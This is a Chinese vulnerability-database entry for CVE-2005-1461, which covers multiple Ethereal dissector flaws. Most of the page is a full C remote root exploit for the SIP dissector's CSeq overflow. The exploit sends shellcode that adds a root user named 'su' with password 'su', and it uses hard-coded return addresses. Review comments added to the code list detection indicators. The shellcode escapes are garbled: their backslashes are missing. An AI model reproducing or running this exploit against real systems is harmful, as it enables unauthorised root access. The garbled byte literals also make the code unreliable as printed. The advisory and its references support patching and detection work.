Ethereal多个协议分析处理模块漏洞

Ethereal多个协议分析处理模块漏洞

漏洞ID 1108829 漏洞类型 缓冲区溢出
发布时间 2005-05-31 更新时间 2005-10-20
CVE编号 CVE-2005-1461
CNNVD-ID CNNVD-200505-929
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1021
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-929
|漏洞详情
Ethereal是一款非常流行的网络协议分析工具。Ethereal厂商报告了各种协议处理模块中的多个漏洞，包括：缓冲区溢出漏洞、格式串漏洞、空指针引用拒绝服务漏洞、分段错误拒绝服务漏洞、死循环漏洞、内存耗尽拒绝服务漏洞、双重释放漏洞以及未明的拒绝服务漏洞。这些漏洞可能允许远程攻击者执行任意代码或导致受影响的应用程序崩溃。
|漏洞EXP
/* tethereal_sip.c (now quite functional)
*
* Ethereal (0.10.0 to 0.10.10) SIP Dissector remote root exploit
*
* Advisory: 
* http://www.ethereal.com/appnotes/enpa-sa-00019.html
* 
* produced by Team W00dp3ck3r:
* fraukx41iser
* mag00n
* s00n
* thorben
* 
* Notes:
* tested on Debian Sarge 
* Linux maggot4 2.6.8-1-386 #1 Mon Sep 13 23:29:55 EDT 2004 i686 GNU/Linux
*
* tested version of ethereal:
* http://www.ethereal.com/distribution/all-versions/ethereal-0.10.10.tar.gz
* (./configure, make, make install ;))
* 
* victim has to switch from normal user to root using "su -" 
* the exploit adds a user named "su" with password "su" on the victim host
* 
*/


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>


/*
 * Fixed head of the SIP request. Read as bytes, the literal decodes to
 * the request line "OPTIONS sip:hack SIP/2.0" followed by two Via
 * headers, a From header and an unterminated "To:" field; main()
 * appends the remaining header fields after it.
 *
 * NOTE(review): in this reproduction the "\x" escapes appear to have
 * lost their backslashes, so the literal as printed is plain ASCII text
 * rather than the bytes the comments in this file describe.
 */
unsigned char sip_header[] = 
"x4fx50x54x49x4fx4ex53x20x73x69x70x3ax68x61x63"
"x6bx20x53x49x50x2fx32x2ex30x0ax56x69x61x3ax20"
"x53x49x50x2fx32x2ex30x2fx55x44x50x20x63x70x63"
"x31x2dx6dx61x72x73x31x2dx33x2dx30x2dx63x75x73"
"x74x32x32x35x2ex6dx69x64x64x2ex63x61x62x6cx65"
"x2ex6ex74x6cx2ex63x6fx6dx3ax35x35x31x31x38x3b"
"x72x70x6fx72x74x0dx0ax56x69x61x3ax20x53x49x50"
"x2fx32x2ex30x2fx55x44x50x20x68x61x63x6bx3ax39"
"x0ax46x72x6fx6dx3ax20x73x69x70x3ax68x61x63x6b"
"x3bx74x61x67x3dx36x31x35x61x65x37x37x30x0ax54"
"x6fx3ax20x73x69x70x3ax68x61x63x6b";

/*
 * Header name for the Call-ID field (decodes to "\nCall-ID: "). main()
 * writes a run of 0x90 bytes followed by the payload directly after it
 * as the field's value, which is what makes the Call-ID of this traffic
 * recognisable: a legitimate user agent never emits such a value.
 */
unsigned char callid[] =
"x0ax43x61x6cx6cx2dx49x44x3ax20";


/* adduser shellcode, user: "su", pwd: "su" Full Size=116, splitted into 
2 parts because one buffer was too small. thx to http://metasploit.com */
/*
 * This array holds 102 bytes (6 lines of 16 plus 6); the remaining 14
 * bytes of the 116 the author cites are the cseq_method array below.
 * main() places this part in the Call-ID value, preceded by 0x90 bytes,
 * so the two parts travel in different SIP header fields of one datagram.
 */
unsigned char shellcode[] =
"x31xc9x83xe9xe9xd9xeexd9x74x24xf4x5bx81x73x13xa5"
"xb7x95xbbx83xebxfcxe2xf4x94x7ex1cx70xcfxf1xcdx76"
"x25xddx90xe3x94x7exc4xd3xd6xc4xe2xdfxcdx98xbaxcb"
"xc4xdfxbaxdexd1xd4x1cx58xe4x02x91x76x25x24x7dx9b"
"xa5xb7x95xc8xd0x8dxd4xfaxdfxf2xacxd4xd4xf9xddxed"
"xf5x82xe6x81x95x8dxa5x81x9fx98xafx94xc7xdexfbx94"
"xd6xdfx9fxe2x2exe6";


/* Header name for the CSeq field (decodes to "\nCSeq: "). The value that
 * main() writes after it is the over-long method token described below. */
unsigned char cseq[] = 
"x0ax43x53x65x71x3ax20";

/* the malformed cseq method field. the buffer has a size of 16 byte. you need 
48 byte to overwrite the return address. the first byte is checked isalpha(), 
so we splitted the shellcode in a way that the first char of cseq_method passes
the isalpha() check. */ 
/*
 * 14 bytes here; main() follows them with 30 bytes of 0x41 ('A') and a
 * 4-byte value, which is how the 48 bytes cited above are reached. From
 * a detection standpoint the CSeq method token in this traffic is far
 * longer than the 16-byte field the comment describes and contains
 * non-alphabetic bytes after the first one.
 */
unsigned char cseq_method[] = 
"x69xd1xa1xefx58x3bxcfxb6xcdx76x25xb7x95xbb";


/* needed to be a fully valid sip packet */
/*
 * Trailing header fields: decodes to "Contact: hack:9", "Content-Length: 0",
 * "Max-Forwards: 70" and "User-Agent: W00dp3ck3r". The fixed User-Agent
 * string is the most specific indicator of this particular tool, and the
 * declared Content-Length of 0 does not match the datagram main() sends.
 */
unsigned char sip_footer[] =
"x0ax43x6fx6ex74x61x63x74x3ax20x68x61x63x6bx3a"
"x39x0ax43x6fx6ex74x65x6ex74x2dx4cx65x6ex67x74"
"x68x3ax20x30x0ax4dx61x78x2dx46x6fx72x77x61x72"
"x64x73x3ax20x37x30x0ax55x73x65x72x2dx41x67x65"
"x6ex74x3ax20x57x30x30x64x70x33x63x6bx33x72x20"
"x0a";



/*
 * Entry point. Builds one SIP OPTIONS datagram from the fixed fragments
 * above, with an over-long CSeq method token, and sends it to UDP port
 * 5060 on argv[2]. argv[1] ('1' or '2') selects one of two hard-coded
 * addresses that are written after the return-address slot.
 * Returns 0 once the datagram has been sent, 1 on a usage, name
 * resolution, socket or send failure.
 *
 * Observable properties of what this sends (useful for detection):
 *  - the datagram is always sizeof(buffer) = 2048 bytes, so the SIP
 *    message is followed by zero padding up to that length;
 *  - the Call-ID value is a run of 0x90 bytes plus a binary payload;
 *  - the CSeq method token is binary, padded with 'A' (0x41) and
 *    followed by three 4-byte addresses, well past the 16-byte field
 *    the comment on cseq_method describes.
 */
int main(int argc, char * argv[]) {
// NOTE(review): p_addr is only assigned for flags '1' and '2'; for any
// other argv[1] the read of p_addr further down is of an uninitialized value.
unsigned int i, offset, ret, p_addr;
struct sockaddr_in dest;
struct hostent *he;
int sock, slen = sizeof(struct sockaddr);
unsigned char buffer[2048];

// help output (the message strings here appear to have lost their "\n"
// escapes in this reproduction; they are left as printed)
if(argc < 3) {
printf("correct syntax: %s <flag> <host> n", argv[0]);
printf("possible flag: n");
printf("1 the ethereal user has started tethereal" 
"with full path as root n");
printf("2 the ethereal user has started tethereal" 
"without directorypath as root n");
return 1;
}

// p_addr may differ on other systems ;)
// (hard-coded per-build stack addresses; only the first character of
// argv[1] is examined)
if (argv[1][0] == '1') {
p_addr = 0xbffee328;
}

if (argv[1][0] == '2') {
p_addr = 0xbffee338;
}

// destination-ip check: resolve argv[2] with the legacy gethostbyname()
if((he = gethostbyname(argv[2])) == NULL) {
printf("[!] Couldn't resolve %sn", argv[2]);
return 1;
}

// open socket (plain UDP; no bind, the kernel picks the source port)
if((sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
perror("socket()");
return 1;
}

// set packet parameters: SIP's default port 5060, first resolved address.
// dest is not zeroed first, so sin_zero stays uninitialized.
dest.sin_port = htons(5060);
dest.sin_family = AF_INET;
dest.sin_addr = *((struct in_addr *)he->h_addr);

// set the returnaddress (may differ on other systems)
ret = 0xbffee240; 


//// generate a buffer containing the data ////
// offset always points at the next free byte of buffer; every fragment
// is copied with its terminating NUL and offset then steps back by one
// so the following fragment overwrites that NUL.
offset = 0;

// set all values of the buffer to 0x0 (this zero fill is what ends up
// on the wire after the message, since sendto() sends the whole array)
memset(buffer, 0x0, sizeof(buffer));

// copy the header into the buffer
memcpy(buffer+offset, sip_header, sizeof(sip_header)); 
offset += sizeof(sip_header) -1;

// concat the callid into the buffer
memcpy(buffer+offset, callid, sizeof(callid)); 
offset += sizeof(callid) -1;

// add the callid-value (nop+shellcode): the 0x90 run is sized so that
// run plus payload (sizeof(shellcode) - 1 bytes) fill exactly 128 bytes
i = 128 - sizeof(shellcode) +1; 
memset(buffer+offset, 0x90, i);
offset += i;

// insert shellcode into buffer
memcpy(buffer+offset, shellcode, sizeof(shellcode));
offset += sizeof(shellcode) -1; 


// concat the cseq
memcpy(buffer+offset, cseq, sizeof(cseq)); 
offset += sizeof(cseq) -1;

// generate the part, which causes the overflow (=cseq-method)
// 14 bytes of cseq_method + 30 bytes of 'A' + 4 bytes of ret = 48,
// the count the comment on cseq_method cites
memcpy(buffer+offset, cseq_method, sizeof(cseq_method)); 
offset += sizeof(cseq_method) -1; 

// fill the rest of cseq_method with A
memset(buffer+offset, 0x41, 30);
offset += 30; 
// write return address
// NOTE(review): type-punned, possibly unaligned store through a long *;
// advancing by 4 assumes a 4-byte little-endian long (i386), so the
// layout would differ on an LP64 build.
*(long *)&buffer[offset] = ret; 
offset += 4;

// repair the first pointer after ret- address
*(long *)&buffer[offset] = 0x08215184; // is a pointer DEST-value: 0x1
offset += 4;
// repair second pointer after ret- address 
*(long *)&buffer[offset] = p_addr;
offset += 4; 

// the finalising part of the message
memcpy(buffer+offset, sip_footer, sizeof(sip_footer)); 

// send the buffer to the victim: note the length is sizeof(buffer), i.e.
// all 2048 bytes including the zero tail, not the bytes actually built.
// The socket is not closed on this error path.
if (sendto(sock, buffer, sizeof(buffer), 0, 
(struct sockaddr *)&dest, slen)== -1) {
printf("[!] Error sending packet!n");
return 1;
}

// DEBUG //
// printf("%sn", buffer);

printf("[*] dark W00dp3ck3r packet sent!n");
close(sock);
return 0;

}

// milw0rm.com [2005-05-31]
|参考资料

来源:www.ethereal.com
链接:http://www.ethereal.com/news/item_20050504_01.html
来源:www.ethereal.com
链接:http://www.ethereal.com/appnotes/enpa-sa-00019.html
来源:BID
名称:13504
链接:http://www.securityfocus.com/bid/13504
来源:REDHAT
名称:RHSA-2005:427
链接:http://www.redhat.com/support/errata/RHSA-2005-427.html
来源:FEDORA
名称:FLSA-2006:152922
链接:http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
来源:CONECTIVA
名称:CLSA-2005:963
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000963
